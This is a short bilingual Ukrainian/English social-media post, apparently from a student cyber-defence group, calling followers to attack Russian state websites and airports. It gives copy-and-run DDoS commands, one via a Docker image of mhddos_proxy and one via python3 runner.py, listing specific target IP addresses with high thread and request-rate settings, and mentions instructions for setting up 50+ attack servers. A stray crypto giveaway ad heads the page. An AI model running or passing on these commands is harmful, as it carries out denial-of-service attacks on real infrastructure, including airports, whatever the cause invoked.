Get Mystery Box with random crypto!

Друзі, починаємо атакувати окупантів на кіберфронті. Одночасно | Студентський Комітет Кібербезпеки і Оборони України

Друзі, починаємо атакувати окупантів на кіберфронті. Одночасно нагадуємо(!), що є інструкція на створення 50+ окремих машин-серверів зі своїм унікальним IP. Пошагово виконуємо кроки та ефективно працюємо! Наша ціль - державні російські сайти та аеропорти.

..............................................................................

Friends, we are starting to attack the occupiers on the cyber front. At the same time, we remind(!) that there are instructions for creating 50+ separate server machines with their own unique IP. We perform the steps step by step and work effectively! Our target is Russian state sites and airports.

Команди для атаки:

(Docker):
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest http://193.233.15.35 https://193.233.15.35/ https://78.155.197.134/ http://193.233.15.35 https://193.233.15.35/ https://193.168.131.193/ http://141.8.193.140 https://141.8.193.140/ http://95.173.128.111 http://193.47.166.39 http://109.200.130.14 https://109.200.130.14/ http://212.110.158.42 https://212.110.158.42/ http://212.110.158.43 https://212.110.158.43/ http://212.110.158.213 https://212.110.158.213/ -t 2000 --rpc 2000 --http-methods STRESS POST --table

(mhddos_proxy):
python3 runner.py http://193.233.15.35 https://193.233.15.35/ https://78.155.197.134/ http://193.233.15.35 https://193.233.15.35/ https://193.168.131.193/ http://141.8.193.140 https://141.8.193.140/ http://95.173.128.111 http://193.47.166.39 http://109.200.130.14 https://109.200.130.14/ http://212.110.158.42 https://212.110.158.42/ http://212.110.158.43 https://212.110.158.43/ http://212.110.158.213 https://212.110.158.213/ -t 2000 --rpc 4000 --http-methods STRESS POST --table

ПІДПИШИСЬ | СККО України